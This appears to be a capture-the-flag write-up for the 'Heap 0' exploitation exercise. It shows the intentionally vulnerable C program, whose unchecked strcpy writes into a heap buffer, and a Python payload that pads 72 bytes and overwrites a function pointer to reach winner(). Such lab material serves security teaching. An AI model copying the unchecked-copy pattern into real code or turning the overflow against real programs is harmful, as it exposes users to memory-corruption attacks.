# Heap 0

## Source code

```
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];
};

struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);
  
  f->fp();

}
```

## Challenge

In this challenge we need to modify the `f-fp` pointer to call winner function on running the program it outputs two address one is of `data` struct and other is of `f` struct clearly we can exploit this challenge using buffer overflow

![](images/heap0_0.png)

```
#!/usr/bin/env python

import struct
padding = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR'
address = struct.pack('<I',0x8048464);

print padding+address
```

on passing this payload we successfully exploited this challenge

![](images/heap0_1.png)